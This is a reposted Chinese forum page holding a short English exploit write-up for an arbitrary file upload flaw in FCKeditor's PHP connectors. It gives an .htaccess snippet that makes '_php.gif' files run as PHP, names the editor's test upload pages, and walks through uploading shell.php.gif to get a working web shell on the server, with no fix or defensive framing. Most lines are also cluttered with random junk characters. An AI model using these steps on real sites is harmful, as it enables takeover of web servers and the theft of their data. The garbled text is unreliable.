FCKeditor所有php版本Upload上传漏洞
! z! w9 T5 k6 \) F# o作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07, h4 b; ~( V. @
减小字体 增大字体
% U t7 l4 r3 C3 a8 X/ @2 O, k[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability+ |( `! P9 n4 @/ i% v9 Q
[+] Date: 2011" P6 ]* z# r4 F. q1 z
[+] Author : sinesafe.cn' D: M- v0 ^( S* }+ e8 t: v
[+] Website : WwW.sinesafe.cn/ W% ]- U8 O" o" j5 b h& |
———————————————————/ t6 X* T% A$ ?# m
1.create a htaccess file:
+ b4 k; Z+ U e) V! n$ _3 Rcode:
, M8 a1 V5 }8 {9 X V8 _9 P<FilesMatch “_php.gif”>2 d7 t/ P. F% j- r6 Q p7 M) q7 z
SetHandler application/x-httpd-php, } M M8 o* N
</FilesMatch>
* G4 M4 H* o9 j. H0 Z! C0 f3 Y; ?8 I5 y) }$ }% m: I, ~
2.Now upload this htaccess with FCKeditor.5 ?. a( H% U9 k, L
3 C% y8 \0 M" ]5 |4 K) v8 q, q
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html# _& l q2 x" j0 o8 T6 o
6 O6 ?2 r- e4 ?0 f" l/ L
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
]/ s1 t' U, v0 C9 g# Y! R/ E) p! K/ k; g" T/ f1 D
———————————————————————————————-2 B$ M$ Q& x( |; U& I6 M( V8 |
3.Now upload shell.php.gif with FCKeditor.
# a" C0 h* x5 F9 r' r4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
4 u I1 q6 E8 N" @; A1 Y5.http://www.sinesafe.cn/anything/shell_php.gif
' {( U, N X$ y2 |) D) V# S1 b6.Now shell is available from server. |
8 ^$ a$ u# n8 H9 f" Z f
% V: u7 Z3 d+ x5 T7 b
2 {0 z+ f. a; _, E
|
发表于 2013-10-27 17:25:21
收藏
支持
反对